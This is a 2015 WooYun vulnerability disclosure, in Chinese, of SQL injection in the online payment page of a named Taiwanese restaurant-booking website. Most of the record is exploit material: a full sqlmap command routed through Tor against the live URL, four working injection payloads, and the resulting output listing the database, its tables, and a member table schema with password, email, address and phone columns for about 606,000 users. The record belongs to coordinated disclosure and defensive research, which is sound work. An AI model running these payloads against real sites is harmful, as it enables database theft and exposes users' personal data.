漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136690
漏洞标题:台湾某美食网站SQL注入/影响60万用户信息
相关厂商:eatogether.com.tw
漏洞作者: 路人甲
提交时间:2015-08-25 00:01
修复时间:2015-10-09 10:38
公开时间:2015-10-09 10:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开
简要描述:
台湾某美食网站SQL注入,影响60万用户信息
详细说明:
台湾某美食网站SQL注入,影响60万用户信息
漏洞证明:
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://www.eatogether.com.tw/onlinepayment.php?mID=9" --data="rs=loadOrder&rst=&rsrnd=1440423864195&rsargs[]=17&rsargs[]=2015-08-24&rsargs[]=1&rsargs[]=1"
---
Parameter: Array-like #3* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: rs=loadOrder&rst=&rsrnd=1440423864195&rsargs[]=-7391' OR 7185=7185#&rsargs[]=2015-08-24&rsargs[]=1&rsargs[]=1
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: rs=loadOrder&rst=&rsrnd=1440423864195&rsargs[]=-5221' OR 1 GROUP BY CONCAT(0x71766a7171,(SELECT (CASE WHEN (9882=9882) THEN 1 ELSE 0 END)),0x7176787a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&rsargs[]=2015-08-24&rsargs[]=1&rsargs[]=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: rs=loadOrder&rst=&rsrnd=1440423864195&rsargs[]=17' AND (SELECT * FROM (SELECT(SLEEP(20)))wdFu)#&rsargs[]=2015-08-24&rsargs[]=1&rsargs[]=1
Type: UNION query
Title: MySQL UNION query (N) - 40 columns
Payload: rs=loadOrder&rst=&rsrnd=1440423864195&rsargs[]=-3145' UNION ALL SELECT 'N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N',CONCAT(0x71766a7171,0x6a635775436f724b5254,0x7176787a71),'N','N'#&rsargs[]=2015-08-24&rsargs[]=1&rsargs[]=1
---
[14:02:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
current database: 'DBL01745'
current user is DBA: False
available databases [2]:
[*] DBL01745
[*] information_schema
Database: DBL01745
[52 tables]
+---------------------------+
| adminUser |
| ads |
| banner |
| catch_way |
| catch_way_ks |
| comments |
| coupon |
| dining_area |
| event_log |
| event_log_orders |
| faq |
| holidays |
| images |
| kiosk_QARec |
| kiosk_QRRec |
| kiosk_QRScan |
| kiosk_callRec |
| maillog |
| marketing_programs |
| marketing_programs_201403 |
| marketing_programs_year |
| marking_20141001 |
| marking_20141001_1 |
| media_reports |
| member |
| menus |
| menus_20131231 |
| menus_20140306 |
| news |
| orders |
| orders_20150818 |
<......>
Database: DBL01745
Table: member
[30 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| level | tinyint(4) |
| accNo | varchar(20) |
| addr | varchar(150) |
| birthday | date |
| chksum | varchar(32) |
| city | int(11) |
| email | varchar(150) |
| epaper | tinyint(1) |
| id | bigint(20) |
| indate | datetime |
| inopr | int(11) |
| joinEato | tinyint(1) |
| joinEatogo | tinyint(1) |
| lastLogin | datetime |
| lastLoginIP | varchar(16) |
| modate | datetime |
| modopr | int(11) |
| mtel | varchar(36) |
| name | varchar(50) |
| nickname | varchar(50) |
| originM | varchar(50) |
| point | int(11) |
| pw | varchar(32) |
| pwts | varchar(50) |
| sex | tinyint(1) |
| state | int(11) |
| status | tinyint(1) |
| status_go | tinyint(1) |
| verify | tinyint(1) |
| zip | int(11) |
+-------------+--------------+
Database: DBL01745
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 606435 |
+--------+---------+
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-08-25 10:37
厂商回复:
感謝通知!
最新状态:
暂无